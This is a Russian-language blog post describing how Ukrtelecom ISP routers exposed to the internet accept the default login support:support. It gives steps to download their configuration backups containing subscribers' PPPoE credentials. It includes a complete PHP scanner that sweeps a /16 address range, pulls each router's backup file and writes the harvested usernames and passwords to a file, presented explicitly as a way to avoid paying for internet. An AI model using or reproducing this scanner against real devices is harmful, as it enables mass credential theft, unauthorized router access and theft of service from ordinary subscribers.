Слыхали об роутерах от Укртелекома за 1 гривну? Тогда мы идём к вам!
Бувально пару часов назад я заметил, что роутеры Укртелекома доступны из сети и при заходе по их ip доступна панель управления роутером и telnet.
Первой мыслью было одно — найти стандартный пароль для таких роутеров.
После минутного поиска цель была достигнута, логин: пароль — support:support.
Ввожу данные в форму и, как не странно, открывается web-панель управления:
Дальнейшее действие — получить данные от PPPoE соединения: переходим в «Management» -> «Settings» -> «Backup» -> нажимаем «Backup settings». После этих действий в ваших руках оказывается XML-файл, в котором содержатся все настройки роутера, в ком числе логин и пароль от PPPoE.
Но на этом плюшки не заканчиваются! Следующая мысль — написать сканер подсети.
Пример кода ниже:
<?php
set_time_limit(0);
$access = 'support:support'; // логин:пароль
$one = '93.113'; // начало подсети (без точки)
function backup($ip, $access)
{
$curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'http://'.$ip.'/backupsettings.conf');
curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
// curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT_MS, 200);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERPWD, $access);
$buffer = curl_exec($curl); curl_close($curl);
if(!empty($buffer))
{
return simplexml_load_string($buffer)->InternetGatewayDevice->WANDevice->WANConnectionDevice->WANPPPConnection;
}
else return false;
}
for($a = 1; $a < 256; $a++){ // генерация цифер после второй точки
for($b = 1; $b < 256; $b++){ // генерация цифер после третьей точки
$file = backup($one.'.'.$a.'.'.$b, $access); // запрос к роутеру
if($file)
{
$save = fopen('login.txt', 'a+');
fwrite($save, $file->Username.':'.$file->Password."n"); // запись в файл
fclose($save);
}
}
}
?>
Вот и всё, за интернет можно не платить.
Исходя из этого всего нужно сделать выводы:
1. Правильная настройка роутера и свежая прошивка — защита от мошенников.
2. Скупой платит дважды.
Автор: ZiGR
